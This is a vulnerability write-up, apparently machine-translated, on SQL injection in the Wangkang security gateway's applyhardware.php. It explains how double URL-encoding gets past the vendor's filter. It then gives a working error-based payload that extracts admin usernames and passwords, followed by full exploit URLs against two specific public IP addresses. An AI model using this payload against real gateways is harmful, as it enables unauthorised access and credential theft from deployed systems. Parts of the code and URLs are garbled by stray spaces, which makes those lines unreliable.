Wangkang security gateway SQL injection (bypassing global anti-injection)

Wangkang security gateway SQL injection (bypassing global anti-injection)

After the last baptism of wangkang technology, the overall security has been greatly improved (clap your hands ...)
Its global filter function is very abnormal. After the study, we finally found an injection that bypasses abnormal global anti-injection.

 

0x01 let's take a look at the global filter function.

// Function inject_check ($ SQL _str) {return preg_match ("/(select | insert | update | delete | drop | '| \/\ * | \. \. \/| \. \/| UNION | into | load_file | outfile)/I ", $ SQL _str );}

Even more abnormal

function str_check($str){if(strstr($str, ' '))return false;if(strstr($str, "'"))return false;if(strstr($str, '"'))return false;if(strstr($str, '/'))return false;if(strstr($str, '&'))return false;if(strstr($str, ';'))return false;if(strstr($str, '%'))return false;return true;}

It is abnormal to call exit () directly when these symbols and characters are detected.

0x02 The following describes how the injection is generated.

The vulnerability file is

/WebPages/applyhardware. php

Some code

include("include/common.inc");session_start();$para = $_SESSION['parastr'];if(!str_check($action))$action = "";switch ($action){case "":redirect("/vpnweb/index.php?para=$para");break;case "applyhardware":$dbh = db_connect();$hard_user = urldecode($hard_user);$hard_pass = urldecode($hard_pass);if(!str_check($hard_user))$hard_user = "";if(!str_check($hard_pass))$hard_pass = "";$query = "select UserId from ISCUserTable where UserName='$hard_user' and Password='$hard_pass'";

The $ hard_user and $ hard_pass parameters are checked by str_check, but the two parameters are obtained after urldecode decoding. The statement that finally enters the SQL query is:

Select UserId from ISCUserTable where UserName = '$ hard_user' and Password = '$ hard_pass'

So I finally thought of combining two parameters to implement injection.

0x03 exploitation of the Injection

Through the analysis of the str_check function, the submitted parameters cannot contain spaces, single quotes, double quotes, diagonal lines, semicolons, and so on. Finally, they have passed numerous tests and the final code is used:

Hard_user = % 255C & hard_pass = % 0a % 0 dand % 0a % 0d1 = (updatexml (1, concat (0x5e24, (select % 0a % 0 dconcat (adminname, 0x7e, passwd) % 0a % 0 dfrom % 0a % 0 dAdmin % 0a % 0 dlimit % 0a % 0d1), 0x5e24), 1) % 2523



Https: // 60.216.87.203 // WebPages/applyhardware. php? Action = applyhardware & hard_user = % 255C & hard_pass = % 0a % 0 dand % 0a % 0d1 = (updatexml (1, concat (0x5e24, (select % 0a % 0 dconcat (adminname, 0x7e, passwd) % 0a % 0 dfrom % 0a % 0 dAdmin % 0a % 0 dlimit % 0a % 0d1), 0x5e24), 1) % 2523
 

https://115.24.177.57/WebPages/applyhardware.php?action=applyhardware&hard_user=%255C&hard_pass=%0a%0dand%0a%0d1=(updatexml(1,concat(0x5e24,(select%0a%0dconcat(adminname,0x7e,passwd)%0a%0dfrom%0a%0dAdmin%0a%0dlimit%0a%0d1),0x5e24),1))%2523
 

 

Solution:

Inject_check () function Filtering